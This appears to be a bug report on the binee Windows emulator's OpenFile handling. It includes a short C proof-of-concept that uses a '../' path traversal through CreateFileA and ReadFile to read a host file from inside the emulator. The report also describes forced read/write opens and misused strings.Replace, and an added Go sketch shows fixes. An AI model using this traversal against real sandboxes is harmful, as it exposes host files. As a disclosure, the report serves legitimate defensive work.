There are multiple issues with the implementation of OpenFile (binee/windows/handles.go, line 37 at commit b923e31).

There exists a trivial directory traversal vulnerability, despite a previous commit attempting to fix it:
```c
#include <Windows.h>
#include <stdio.h>

int main(int argc, char** argv)
{
    /* Relative path that climbs out of the emulated program's directory; binee resolves it on the host. */
    HANDLE h = CreateFileA("../../../../../../../../../test", GENERIC_READ, FILE_SHARE_READ, NULL,
                           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) {
        OutputDebugStringA("invalid handle");
        return 1;
    }
    char buf[128];
    DWORD nr = 0;                       /* ReadFile takes an LPDWORD, not an int* */
    BOOL ok = ReadFile(h, buf, sizeof(buf) - 1, &nr, NULL);
    if (!ok) {
        OutputDebugStringA("readfile err");
        CloseHandle(h);
        return 1;
    }
    buf[nr] = '\0';                     /* ReadFile does not NUL-terminate the buffer */
    OutputDebugStringA(buf);
    CloseHandle(h);
    return 0;
}
```
Create the file /test, put something in it, and binee will fetch that content and display it in the emulation output. You may need to do some shenanigans with a manual entrypoint to get this to run under binee, due to #19. This can also be demonstrated with WriteFile.
Binee will by default open every file for reading and writing, regardless of what permissions were requested. This has a variety of implications, since the emulated program will not be able to read any files that are read only. Ironically this neuters the above vulnerability a bit, since you can only read from world-writeable/user-writeable files.
In Go, strings.Replace does not modify the string in place; it returns a copy with the replacements made. Therefore the replacements will have no effect (except on line 60), since the unmodified path variable is reused.
Line 56 is buggy. This path will also be taken if the path being opened merely contains the executable's filename, for example if malware.exe tries to open malware.exe.res.
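As an added illustration (not code from binee), the sketch below shows how an OpenFile-style wrapper could handle the three problems described above: the discarded strings.Replace result, the substring self-open check, and the unconditional read/write open. The function names, the sandbox root passed in, and the guest paths are constructed for the example.

```go
package main

import (
	"errors"
	"os"
	"path/filepath"
	"strings"
)

// Desired-access bits the guest passes to CreateFile (real Windows values).
const (
	genericRead  = 0x80000000
	genericWrite = 0x40000000
)

var errEscapesRoot = errors.New("guest path escapes sandbox root")

// buggyStrip reproduces the issue's mistake: the strings.Replace result is discarded.
func buggyStrip(path string) string {
	strings.Replace(path, "..", "", -1) // return value thrown away, path unchanged
	return path
}

// confine maps a Windows-style guest path onto root and refuses any path that climbs above it.
func confine(root, guestPath string) (string, error) {
	p := strings.ReplaceAll(guestPath, `\`, "/")
	if len(p) >= 2 && p[1] == ':' { // drop a drive letter such as "C:"
		p = p[2:]
	}
	rel := filepath.Clean(strings.TrimLeft(p, "/"))
	if rel == ".." || strings.HasPrefix(rel, "../") {
		return "", errEscapesRoot
	}
	return filepath.Join(root, rel), nil
}

// opensSelf compares cleaned paths for equality; a substring check would also fire for "malware.exe.res".
func opensSelf(exe, target string) bool {
	return filepath.Clean(target) == filepath.Clean(exe)
}

// hostFlags derives the host open mode from the requested access instead of always opening read/write.
func hostFlags(desiredAccess uint32) int {
	if desiredAccess&genericWrite == 0 {
		return os.O_RDONLY
	}
	if desiredAccess&genericRead == 0 {
		return os.O_WRONLY
	}
	return os.O_RDWR
}
```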